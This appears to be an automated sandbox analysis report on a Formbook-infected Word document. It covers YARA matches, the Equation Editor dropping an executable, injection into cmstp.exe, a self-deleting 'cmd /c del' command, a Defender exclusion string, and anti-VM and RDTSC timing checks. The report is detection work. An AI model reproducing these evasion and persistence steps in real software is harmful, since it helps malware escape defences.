          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00ABE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B2F970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B03F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00ABDF5C appears 121 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B0373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0201DF5C appears 121 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0206373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0201E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004185D0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00418680 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00418700 NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004185CA NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004186FA NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00146F12 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020110D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020101D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A87B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A85CA NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A86FA NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A87AA NtAllocateVirtualMemory,
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Memory allocated: 76E90000 page execute and read and write
          Source: ashlyzx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ashlkyvc7592.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$O-5433ERE.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD883.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: title field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: author field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb | source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb | source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_003412DD push esp; retn 002Dh
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_00343652 push esp; retn 002Dh
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B87C push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B812 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B81B push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004068A0 push es; retf
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0040697C push esi; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00414406 push B75A778Ch; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041CEBD push ebp; retf
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B7C5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00414FF5 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00415FFA push ecx; iretd
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A4406 push B75A778Ch; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000968A0 push es; retf
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8913 push ds; retn 4797h
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0009697C push esi; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000ACEBD push ebp; retf
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A5FFA push ecx; iretd
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A4FF5 push ecx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.66317958598
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | RDTSC instruction interceptor: first address: 0000000000408604, second address: 000000000040860A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | RDTSC instruction interceptor: first address: 000000000040898E, second address: 0000000000408994, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: first address: 0000000000098604, second address: 000000000009860A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: first address: 000000000009898E, second address: 0000000000098994, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 | Thread sleep time: -300000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004088C0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread delayed: delay time: 922337203685477
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp | Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
          Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
